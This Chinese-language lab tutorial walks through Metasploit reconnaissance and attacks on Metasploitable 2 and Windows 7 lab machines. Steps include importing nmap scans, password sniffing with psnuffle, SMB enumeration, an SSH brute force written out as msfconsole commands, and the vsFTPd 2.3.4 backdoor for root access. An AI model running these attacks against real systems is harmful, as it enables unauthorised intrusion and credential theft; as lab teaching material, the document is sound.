本节课靶机1 metasploitable 2
用户名和密码:msfadmin
ip : 192.168.2.146
文章最后有靶机1安装教程
靶机2 windows 7
用户名和密码 root
ip: 192.168.2.145
1、NMAP的扫描结果导入到Metasploit数据库中
┌──(root㉿root)-[~/桌面]
─# nmap -A yijincc.com -oX yijincc.xml
打开 msfconsole
导入到数据库
hosts 查看
查看扫描结果开放了哪些服务
services -R ip #指定ip查看
2、使用半连接方式扫描TCP端口
例子:扫描网关 80 端口是否开放
3、使用auxiliary /sniffer下的psnuffle模块进行密码嗅探
info 查看psnuffle模块作用
重新打开一个终端连接一下ftp格式:
──(root㉿root)-[~/桌面]
└─# apt install lftp -y
┌──(root㉿root)-[~/桌面]
└─# lftp 192.168.2.146 -u msfadmin
3、使用SNMP协议收集主机信息(后期补充,目前靶机不匹配)
4、使用SMB协议收集信息(靶机2)
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统
(Common Internet File System,缩写为CIFS), - -种应用层网络传输协议,由微软开发,主要功能
是使网络.上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Unix服务器厂商
重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务。
例子:使用smb_ version基于SMB协议扫描版本号
msf6 > search smb_ version
msf6 > use 1
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.2.145
注:可以扫描出来操作系统的版本号,版本号很准确。
使用smb_ enumshares基于SMB协议扫共享文件(账号、密码)
SMB的模块中基本.上都是可以配置用户名和密码的,配置了用户名和密码某些模块扫描的结果
会更满足我们的需求。
使用smb_ lookupsid 扫描系统用户信息(SID枚举)
5、 基于SSH协议收集信息
查看ssh服务的版本信息(靶场1)
msf6 > search ssh_version
ssh暴力破解
msf6 > search ssh_login
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.2.146
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
打开一个新的终端 #里面是密码类型
┌──(root㉿root)-[~/桌面]
└─# cd /usr/share/metasploit-framework/data/wordlists/
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
注:这里有一个注意事项,由于是靶机操作,所以把正确密码放在/usr/share/metasploit-
framework/data/wordlists/root_userpass.txt这个文件里面了
6、基于FTP协议收集信息
查看ftp服务的版本信息(靶机1)
搜索vsFTPd 2.3.4漏洞
直接拿到root 权限
ftp匿名登录扫描
扫描结果只可读不可写
ftp暴力破解
破解成功